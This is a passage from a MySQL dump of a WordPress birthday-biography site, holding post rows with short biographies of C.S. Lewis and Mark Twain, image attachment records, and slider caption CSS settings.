the best talk show hosts out there. Not to mention his razor sharp wit that always seems to lure audiences in. With this new deal he has now signed with HBO. Fans now more than ever have more to look forward too from this talented man. Jon Stewart does not appear to be slowing down in his career anytime soon. So, people can look forward to many more years of seeing him.\r\n\r\n \r\n\r\n ','Jon Stewart (1962 – Present)','','publish','open','open','','jon-stewart','','','2016-11-23 03:16:40','2016-11-23 03:16:40','',0,'http://birthdaypedia.com/?p=569',0,'post','',0),(570,2,'2015-11-29 08:02:56','2015-11-29 08:02:56','C.S. Lewis is a literary legend. His name is one everyone has heard at least once. While he\'s an excellent scholar, he\'s well known for his Chronicles of Narnia fantasy series.\r\n<h3>In the Beginning</h3>\r\nLewis was born on November 29, 1898 in <a href=\"http://www.ireland.com/en-us/destinations/northern-ireland/county-antrim/belfast/articles/belfast-city/\" target=\"_blank\">Belfast, Ireland</a>. His parents were Albert J. Lewis and Flora August Hamilton Lewis. When he was toddler he stated his name was Jack. His friends and family went along with it and called him the new name. As a child Lewis was close to his older brother. As children, the two were always in each other\'s presence. Lewis was fascinated by stories of gallantry and amazing animals. So, he and his brothers created a made-up world they called Boxen. They gave their make believe world and intricate history that kept them entertained for years.\r\n\r\nWhen he was ten his mother passed away. Lewis had a pre-college education by enrolling in boarding schools and from a tutor. He served in the British army in WWI and was sent home due to an injury caused by shrapnel. He lived as a surrogate son with a friend of mother\'s called Janie Moore. In the war Janie Moore\'s son was killed.\r\n\r\nHe graduated from Oxford University with a focus on classic philosophy and literature. He was awarded a teaching position in 1925 at Magdalen College. While there he joined up with a group that called themselves The Inklings. It was a collective of intellectuals and writers. One of them Lewis\' brother and the famous <a href=\"https://en.wikipedia.org/wiki/J._R._R._Tolkien\" target=\"_blank\">J.R.R. Tolkien</a>. The group had many conversations and Lewis even embraced Christianity again. It was from this point his writing began to evolve its rich apologist texts. Where he went on to explain his own spiritual beliefs using philosophy and logic.\r\n<h3>Career Accomplishments</h3>\r\nLewis became a well known apologist writer. He used philosophy and logic in order to support the beliefs of Christian faith. One of his first books was published in the 1920s called <em>Dymer</em> in 1926. He wrote a few other titles called <em>The Allegory of Love</em> in 1936. He won the Hawthornden Prize for the book. In 1938, he released a sci-fi book called <em>Out of the Silent Planet</em> which became his first book out of a trilogy.\r\n<h3>Most Known For</h3>\r\nPerhaps one of his most celebrated works is Lewis\' book series called <a href=\"https://en.wikipedia.org/wiki/The_Chronicles_of_Narnia\" target=\"_blank\">The Chronicles of Narnia</a>. A fantasy series that has taken the world by storm. The series has been adapted multiple times for stage productions. Along with being adapted for small and big screens too.\r\n<h3>Current Personal Life</h3>\r\nLewis joined the faculty of Cambridge University in 1954 working as a literature professor. In 1956, he marred <a href=\"https://www.awesomestories.com/asset/view/C.S.-LEWIS-and-JOY-DAVIDMAN-GRESHAM-C.S.-Lewis\" target=\"_blank\">Joy Gresham</a> who worked as an American English teacher. Lewis\' marriage was a happy one, but Gresham passed away due to cancer in 1960. He grieved the passing of his wife and even shared his thoughts on the matter in a book he wrote called <em>A Grief Observed</em> he published under a pen name.\r\n<h3>Where Are They Now</h3>\r\nHe resigned from his position at Cambridge in 1963. He had begun to experience issues with his heart. He passed away that same year on November 22<sup>nd</sup> in Headington, Oxford. Despite his passing, his literary works have continued to live on.\r\n\r\nThe Chronicles of Narnia have seen quite a few on-screen adaptions. Along with a cartoon version made of <em>The Lion, The Witch and the Wardrobe</em>. In 2005, there was a large screen adaption of <em>The Lion, The Witch and the Wardrobe</em> that was big hit in the movie theaters. Soon after, two more film adaptions from Lewis\' books have seen the big screen. <em>Prince Caspian</em> in 2008 and <em>The Voyage of the Dawn Treader</em> in 2010.\r\n\r\n ','C.S. Lewis (1898 – 1963)','','draft','open','open','','','','','2015-11-27 14:46:58','2015-11-27 14:46:58','',0,'http://birthdaypedia.com/?p=570',0,'post','',0),(572,2,'2016-11-30 03:12:17','2016-11-30 03:12:17','Mark Twain is a highly intelligent adventurer who is famous for writing one of the classic American novels. <em>The Adventures of Huckleberry Finn</em> and <em>The Adventures of Tom Sawyer</em>.\r\n<h3>In the Beginning</h3>\r\nMark Twain (born Samuel Langhorne Clemens, Mark Twain is his pen name) was born on November 30, 1835 in <a href=\"https://en.wikipedia.org/wiki/Florida,_Missouri\" target=\"_blank\">Florida, Missouri</a>. He was the sixth child to be born to Jane and John Clemens. He was four years old when his family moved to Hannibal.\r\n\r\nHis father, John, worked a number of jobs. He worked as a land speculator, storekeeper, judge, and lawyer. He had big dreams of wealth, but could never reach it. There were times it was hard for him to even provide for the family. Twain\'s mother on the other hand enjoyed having fun. She was a homemaker, and spent many a winter\'s eve telling stories to the family. John passed away in 1847, making Jane head of the house. At this point in time the Clemens became known as destitute due to the change in their situation. This means years where the family struggled, and served to shape Mark Twain not only as a person, but his career too.\r\n\r\nMark Twain lived in Hannibal until he was seventeen years old. Violence was common in the town Twain grew up in. He was usually a witness to death too. When he was only nine he saw a man murdered on a cattle ranch. At the age of ten a slave died in front of him when a white overseer struck the man with a piece of iron.\r\n\r\nTwain stayed in school until he was twelve years old. His family needed money, so he got a job as an apprentice printer at <em>Hannibal Courier</em>. He received a ration of food as his payment. When he was fifteen, he got a job as an editor, writer, and printed at Hannibal Western Union. The small newspaper was owned by a brother of his named Orion.\r\n<h3>Career Accomplishments</h3>\r\n<a href=\"http://www.history.com/news/history-lists/8-things-you-may-not-know-about-mark-twain\" target=\"_blank\">Mark Twain</a> was an interesting man. On top of publishing two major classics for American literature that are still enjoyed to this day. He worked as an inventor, riverboat pilot, entrepreneur, journalist, and lecturer. He even invented his pen name, Mark Twain, despite his real name being Samuel L. Clemens. For the last fifteen years of his life he had degrees from Yale and Oxford. Along with public honors. He was applauded and photographed as well whenever he traveled, and considered a celebrity for his time.\r\n<h3>Most Known For</h3>\r\nMark Twain published many works, but two of his novels have become known as American classics. <em><a href=\"http://www.cliffsnotes.com/literature/a/the-adventures-of-tom-sawyer/book-summary\" target=\"_blank\">The Adventures of Tom Sawyer</a></em> and <em><a href=\"https://en.wikipedia.org/wiki/Adventures_of_Huckleberry_Finn\" target=\"_blank\">Adventures of Huckleberry Finn</a></em> two of his most popular novels.\r\n<h3>Current Personal Life</h3>\r\nHe married a woman named Olivia (Livy) Langdon in February of 1870. Early on in their marriage though, tragedy struck. They lost their son, Langdon, to diphtheria. His daughter Susy passed away due to Spinal meningitis when she was only 24 years old. The passing broke his heart, and his daughter Jean died as well to severe epilepsy. For quite a few years his relationship with his other daughter, Clara, was rocky as well for many years.\r\n\r\nIn June of 1904, his wife passed away as well due to illness. He had been married to Livy for 34 years and loved her quite a bit.\r\n<h3>Where Are They Now</h3>\r\nLater in his years, Twain became bitter. He did project a cheerful public image though. In privacy he was insensitive to his loved ones and friends. Twain still wrote, but rarely finished the majority of his projects. His memory began to go. He suffered from severe paranoia and anger issues. At times he would sink into a deep depression as well. He tried to ease it by reading in bed, playing cards or billiards for hours, and smoking cigars.\r\n\r\nTwain passed away on April 21, 1910 when he was 74 years old in Redding, Connecticut. He was put to rest in Elmira, New York.\r\n\r\n \r\n\r\n ','Mark Twain (1835 – 1910)','','publish','open','open','','mark-twain','','','2016-11-23 03:17:34','2016-11-23 03:17:34','',0,'http://birthdaypedia.com/?p=572',0,'post','',0),(575,2,'2015-11-30 22:12:31','2015-11-30 22:12:31','','Pablo Picasso birthday','','inherit','open','closed','','pablo-picasso-birthday','','','2015-11-30 22:12:36','2015-11-30 22:12:36','',496,'http://birthdaypedia.com/wp-content/uploads/2015/10/Pablo-Picasso-birthday.jpg',0,'attachment','image/jpeg',0),(577,2,'2015-11-30 22:23:02','2015-11-30 22:23:02','','hillary clinton birthday','','inherit','open','closed','','hillary-clinton-birthday-2','','','2015-11-30 22:23:06','2015-11-30 22:23:06','',497,'http://birthdaypedia.com/wp-content/uploads/2015/10/hillary-clinton-birthday.jpg',0,'attachment','image/jpeg',0),(579,2,'2016-11-23 03:07:47','2016-11-23 03:07:47','','jon_stewart','','inherit','open','closed','','jon_stewart','','','2016-11-23 03:07:47','2016-11-23 03:07:47','',569,'http://birthdaypedia.com/wp-content/uploads/2015/11/Jon_stewart.jpg',0,'attachment','image/jpeg',0),(581,2,'2016-11-23 03:12:05','2016-11-23 03:12:05','','mark_twain','','inherit','open','closed','','mark_twain','','','2016-11-23 03:12:05','2016-11-23 03:12:05','',572,'http://birthdaypedia.com/wp-content/uploads/2015/11/Mark_Twain.jpg',0,'attachment','image/jpeg',0),(584,2,'2016-11-23 15:16:37','2016-11-23 15:16:37','','220px-c-s-lewis3','','inherit','open','closed','','220px-c-s-lewis3','','','2016-11-23 15:16:37','2016-11-23 15:16:37','',570,'http://birthdaypedia.com/wp-content/uploads/2015/11/220px-C.s.lewis3_.jpg',0,'attachment','image/jpeg',0),(586,2,'2016-11-23 15:27:36','2016-11-23 15:27:36','','jimi-hendrix1','','inherit','open','closed','','jimi-hendrix1','','','2016-11-23 15:27:36','2016-11-23 15:27:36','',568,'http://birthdaypedia.com/wp-content/uploads/2015/11/jimi-hendrix1.jpg',0,'attachment','image/jpeg',0),(588,2,'2016-11-23 15:30:54','2016-11-23 15:30:54','','tina-turner','','inherit','open','closed','','tina-turner-2','','','2016-11-23 15:30:54','2016-11-23 15:30:54','',567,'http://birthdaypedia.com/wp-content/uploads/2015/11/tina-turner.jpg',0,'attachment','image/jpeg',0),(590,2,'2016-11-23 15:33:00','2016-11-23 15:33:00','','tina-turner1','','inherit','open','closed','','tina-turner1','','','2016-11-23 15:33:00','2016-11-23 15:33:00','',567,'http://birthdaypedia.com/wp-content/uploads/2015/11/tina-turner1.jpg',0,'attachment','image/jpeg',0),(591,2,'2016-11-23 15:36:36','2016-11-23 15:36:36','','idimagg001p1','idimagg001p1','inherit','open','closed','','idimagg001p1','','','2016-11-23 15:36:36','2016-11-23 15:36:36','',566,'http://birthdaypedia.com/wp-content/uploads/2015/11/joe-dimaggio.jpg',0,'attachment','image/jpeg',0),(593,2,'2016-11-23 15:40:06','2016-11-23 15:40:06','','joe-dimaggio1','','inherit','open','closed','','joe-dimaggio1','','','2016-11-23 15:40:06','2016-11-23 15:40:06','',566,'http://birthdaypedia.com/wp-content/uploads/2015/11/joe-dimaggio1.jpg',0,'attachment','image/jpeg',0),(595,2,'2016-11-23 15:45:56','2016-11-23 15:45:56','','sarah-hyland','','inherit','open','closed','','sarah-hyland-2','','','2016-11-23 15:45:56','2016-11-23 15:45:56','',564,'http://birthdaypedia.com/wp-content/uploads/2015/11/sarah-hyland.jpg',0,'attachment','image/jpeg',0),(598,2,'2016-11-23 15:51:39','2016-11-23 15:51:39','','miley-cyrus','','inherit','open','closed','','miley-cyrus-2','','','2016-11-23 15:51:39','2016-11-23 15:51:39','',560,'http://birthdaypedia.com/wp-content/uploads/2015/11/miley-cyrus.jpg',0,'attachment','image/jpeg',0),(602,2,'2016-11-23 16:02:55','2016-11-23 16:02:55','','scarlett-johansson','','inherit','open','closed','','scarlett-johansson','','','2016-11-23 16:02:55','2016-11-23 16:02:55','',559,'http://birthdaypedia.com/wp-content/uploads/2015/11/Scarlett-Johansson.jpg',0,'attachment','image/jpeg',0),(603,2,'2016-11-23 16:18:31','2016-11-23 16:18:31','','harold_ramis1','','inherit','open','closed','','harold_ramis1','','','2016-11-23 16:18:31','2016-11-23 16:18:31','',558,'http://birthdaypedia.com/wp-content/uploads/2015/11/harold_ramis1.jpg',0,'attachment','image/jpeg',0),(605,2,'2016-11-24 13:58:56','2016-11-24 13:58:56','','jon_stewart','','inherit','open','closed','','jon_stewart-2','','','2016-11-24 13:58:56','2016-11-24 13:58:56','',569,'http://birthdaypedia.com/wp-content/uploads/2015/11/Jon_stewart-1.jpg',0,'attachment','image/jpeg',0),(610,2,'2016-11-28 15:30:29','2016-11-28 15:30:29','','sarah-hyland','','inherit','open','closed','','sarah-hyland-3','','','2016-11-28 15:30:29','2016-11-28 15:30:29','',564,'http://birthdaypedia.com/wp-content/uploads/2015/11/sarah-hyland-1.jpg',0,'attachment','image/jpeg',0),(614,2,'2016-11-28 15:50:33','2016-11-28 15:50:33','','robert-kennedy1','','inherit','open','closed','','robert-kennedy1','','','2016-11-28 15:50:33','2016-11-28 15:50:33','',553,'http://birthdaypedia.com/wp-content/uploads/2015/11/robert-kennedy1.jpg',0,'attachment','image/jpeg',0),(616,2,'2016-11-28 16:02:00','2016-11-28 16:02:00','','calvin-klein','','inherit','open','closed','','calvin-klein-2','','','2016-11-28 16:02:00','2016-11-28 16:02:00','',550,'http://birthdaypedia.com/wp-content/uploads/2015/11/calvin-klein.jpg',0,'attachment','image/jpeg',0),(618,2,'2016-11-28 16:11:14','2016-11-28 16:11:14','','owen-wilson','','inherit','open','closed','','owen-wilson-2','','','2016-11-28 16:11:14','2016-11-28 16:11:14','',549,'http://birthdaypedia.com/wp-content/uploads/2015/11/Owen-Wilson.jpg',0,'attachment','image/jpeg',0),(620,2,'2016-11-28 16:28:04','2016-11-28 16:28:04','','danny-devito','','inherit','open','closed','','danny-devito-2','','','2016-11-28 16:28:04','2016-11-28 16:28:04','',548,'http://birthdaypedia.com/wp-content/uploads/2015/11/danny-devito.jpg',0,'attachment','image/jpeg',0),(622,2,'2016-11-28 16:54:36','2016-11-28 16:54:36','','lisa-bonet','','inherit','open','closed','','lisa-bonet-2','','','2016-11-28 16:54:36','2016-11-28 16:54:36','',547,'http://birthdaypedia.com/wp-content/uploads/2015/11/Lisa-Bonet.jpg',0,'attachment','image/jpeg',0),(624,2,'2016-11-28 16:58:57','2016-11-28 16:58:57','','lily-aldridge','','inherit','open','closed','','lily-aldridge-2','','','2016-11-28 16:58:57','2016-11-28 16:58:57','',546,'http://birthdaypedia.com/wp-content/uploads/2015/11/Lily-Aldridge.jpg',0,'attachment','image/jpeg',0),(627,2,'2016-11-28 19:10:06','2016-11-28 19:10:06','','prince-charles','','inherit','open','closed','','prince-charles-2','','','2016-11-28 19:10:06','2016-11-28 19:10:06','',545,'http://birthdaypedia.com/wp-content/uploads/2015/11/prince-charles.jpg',0,'attachment','image/jpeg',0),(629,2,'2016-11-28 19:12:41','2016-11-28 19:12:41','','whoopi-goldberg','','inherit','open','closed','','whoopi-goldberg-2','','','2016-11-28 19:12:41','2016-11-28 19:12:41','',540,'http://birthdaypedia.com/wp-content/uploads/2015/11/whoopi-goldberg.jpg',0,'attachment','image/jpeg',0),(631,2,'2016-11-28 19:15:48','2016-11-28 19:15:48','','ryan-gosling','','inherit','open','closed','','ryan-gosling-2','','','2016-11-28 19:15:48','2016-11-28 19:15:48','',535,'http://birthdaypedia.com/wp-content/uploads/2015/11/ryan-gosling.jpg',0,'attachment','image/jpeg',0),(633,2,'2016-11-28 19:25:06','2016-11-28 19:25:06','','leo-dicaprio','','inherit','open','closed','','leo-dicaprio-2','','','2016-11-28 19:25:06','2016-11-28 19:25:06','',534,'http://birthdaypedia.com/wp-content/uploads/2015/11/leo-dicaprio.jpg',0,'attachment','image/jpeg',0),(635,2,'2016-11-28 19:26:53','2016-11-28 19:26:53','','leo-dicaprio2','','inherit','open','closed','','leo-dicaprio2','','','2016-11-28 19:26:53','2016-11-28 19:26:53','',534,'http://birthdaypedia.com/wp-content/uploads/2015/11/leo-dicaprio2.jpg',0,'attachment','image/jpeg',0),(636,2,'2016-11-28 19:30:10','2016-11-28 19:30:10','','tracy_morgan','','inherit','open','closed','','tracy_morgan','','','2016-11-28 19:30:10','2016-11-28 19:30:10','',533,'http://birthdaypedia.com/wp-content/uploads/2015/11/tracy_morgan.jpg',0,'attachment','image/jpeg',0),(638,2,'2016-11-28 19:34:19','2016-11-28 19:34:19','','carlsagan','','inherit','open','closed','','carlsagan','','','2016-11-28 19:34:19','2016-11-28 19:34:19','',532,'http://birthdaypedia.com/wp-content/uploads/2015/11/CarlSagan.jpg',0,'attachment','image/jpeg',0),(640,2,'2016-11-28 22:18:56','2016-11-28 22:18:56','','carlsagan','','inherit','open','closed','','carlsagan-2','','','2016-11-28 22:18:56','2016-11-28 22:18:56','',532,'http://birthdaypedia.com/wp-content/uploads/2016/11/carlsagan.jpg',0,'attachment','image/jpeg',0),(641,2,'2016-11-28 22:22:12','2016-11-28 22:22:12','','carlsagan','','inherit','open','closed','','carlsagan-3','','','2016-11-28 22:22:12','2016-11-28 22:22:12','',532,'http://birthdaypedia.com/wp-content/uploads/2016/11/carlsagan-1.jpg',0,'attachment','image/jpeg',0),(642,2,'2016-11-28 22:29:29','2016-11-28 22:29:29','','gordonramsay1','','inherit','open','closed','','gordonramsay1','','','2016-11-28 22:29:29','2016-11-28 22:29:29','',531,'http://birthdaypedia.com/wp-content/uploads/2015/11/GordonRamsay1.jpg',0,'attachment','image/jpeg',0),(644,2,'2016-11-28 22:33:17','2016-11-28 22:33:17','','lorde','','inherit','open','closed','','lorde-2','','','2016-11-28 22:33:17','2016-11-28 22:33:17','',530,'http://birthdaypedia.com/wp-content/uploads/2015/11/lorde.jpg',0,'attachment','image/jpeg',0),(646,2,'2016-11-28 22:36:57','2016-11-28 22:36:57','','lamarodom','','inherit','open','closed','','lamarodom','','','2016-11-28 22:36:57','2016-11-28 22:36:57','',529,'http://birthdaypedia.com/wp-content/uploads/2015/11/LamarOdom.jpg',0,'attachment','image/jpeg',0),(648,2,'2016-11-28 22:43:21','2016-11-28 22:43:21','','krisjenner','','inherit','open','closed','','krisjenner','','','2016-11-28 22:43:21','2016-11-28 22:43:21','',528,'http://birthdaypedia.com/wp-content/uploads/2015/11/krisjenner.jpg',0,'attachment','image/jpeg',0),(650,2,'2016-11-28 22:44:56','2016-11-28 22:44:56','','krisjenner','','inherit','open','closed','','krisjenner-2','','','2016-11-28 22:44:56','2016-11-28 22:44:56','',528,'http://birthdaypedia.com/wp-content/uploads/2015/11/krisjenner-1.jpg',0,'attachment','image/jpeg',0),(651,2,'2016-11-28 22:46:09','2016-11-28 22:46:09','','krisjenner','','inherit','open','closed','','krisjenner-3','','','2016-11-28 22:46:09','2016-11-28 22:46:09','',528,'http://birthdaypedia.com/wp-content/uploads/2015/11/KrisJenner.jpg',0,'attachment','image/jpeg',0),(652,2,'2016-11-28 22:55:25','2016-11-28 22:55:25','','jessaduggar','','inherit','open','closed','','jessaduggar','','','2016-11-28 22:55:25','2016-11-28 22:55:25','',527,'http://birthdaypedia.com/wp-content/uploads/2015/11/jessaduggar.jpg',0,'attachment','image/jpeg',0),(654,2,'2016-11-28 23:02:56','2016-11-28 23:02:56','','kendalljenner','','inherit','open','closed','','kendalljenner','','','2016-11-28 23:02:56','2016-11-28 23:02:56','',526,'http://birthdaypedia.com/wp-content/uploads/2015/11/KendallJenner.jpg',0,'attachment','image/jpeg',0),(656,2,'2016-11-28 23:06:12','2016-11-28 23:06:12','','Kendell Jenner Celebrates The Launch Of The New Estee Lauder Fragrance Modern Muse Le Rouge','NEW YORK, NY - SEPTEMBER 18: Kendell Jenner celebrates the launch of the new Estee Lauder Fragrance Modern Muse Le Rouge at Macy\'s Herald Square on September 18, 2015 in New York City. (Photo by John Lamparski/WireImage)','inherit','open','closed','','kendell-jenner-celebrates-the-launch-of-the-new-estee-lauder-fragrance-modern-muse-le-rouge','','','2016-11-28 23:06:12','2016-11-28 23:06:12','',526,'http://birthdaypedia.com/wp-content/uploads/2015/11/kendalljenner.jpg',0,'attachment','image/jpeg',0),(657,2,'2016-11-28 23:10:13','2016-11-28 23:10:13','','kendalljenner','','inherit','open','closed','','kendalljenner-2','','','2016-11-28 23:10:13','2016-11-28 23:10:13','',526,'http://birthdaypedia.com/wp-content/uploads/2015/11/kendalljenner-1.jpg',0,'attachment','image/jpeg',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_revslider_css`
--
DROP TABLE IF EXISTS `wp_revslider_css`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_css` (
`id` int(9) NOT NULL AUTO_INCREMENT,
`handle` text NOT NULL,
`settings` longtext DEFAULT NULL,
`hover` longtext DEFAULT NULL,
`params` text NOT NULL,
`advanced` longtext DEFAULT NULL,
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=110 DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_revslider_css`
--
LOCK TABLES `wp_revslider_css` WRITE;
/*!40000 ALTER TABLE `wp_revslider_css` DISABLE KEYS */;
INSERT INTO `wp_revslider_css` VALUES (1,'.tp-caption.medium_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"padding\":\"2px 4px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#888\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(2,'.tp-caption.small_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"14px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(3,'.tp-caption.medium_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(4,'.tp-caption.large_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(5,'.tp-caption.very_large_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\",\"letter-spacing\":\"-2px\"},\"hover\":\"\"}'),(6,'.tp-caption.very_big_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"padding\":\"0px 4px\",\"background-color\":\"#000\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\",\"padding-top\":\"1px\"},\"hover\":\"\"}'),(7,'.tp-caption.very_big_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#000\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"padding\":\"0px 4px\",\"background-color\":\"#fff\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\",\"padding-top\":\"1px\"},\"hover\":\"\"}'),(8,'.tp-caption.modern_medium_fat','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#000\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(9,'.tp-caption.modern_medium_fat_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(10,'.tp-caption.modern_medium_light','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#000\",\"font-weight\":\"300\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(11,'.tp-caption.modern_big_bluebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#4e5b6c\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"letter-spacing\":\"0\"},\"hover\":\"\"}'),(12,'.tp-caption.modern_big_redbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#de543e\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"padding-top\":\"1px\",\"letter-spacing\":\"0\"},\"hover\":\"\"}'),(13,'.tp-caption.modern_small_text_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#555\",\"font-size\":\"14px\",\"line-height\":\"22px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(14,'.tp-caption.boxshadow','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','[]','{\"idle\":{\"-moz-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"-webkit-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\"},\"hover\":\"\"}'),(15,'.tp-caption.black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#000\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(16,'.tp-caption.noshadow','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','[]','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(17,'.tp-caption.thinheadline_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"rgba(0,0,0,0.85)\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\"},\"hover\":\"\"}'),(18,'.tp-caption.thintext_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"rgba(0,0,0,0.85)\",\"font-weight\":\"300\",\"font-size\":\"16px\",\"line-height\":\"26px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\"},\"hover\":\"\"}'),(19,'.tp-caption.largeblackbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#000\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}'),(20,'.tp-caption.largepinkbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#db4360\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}'),(21,'.tp-caption.largewhitebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#000\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open 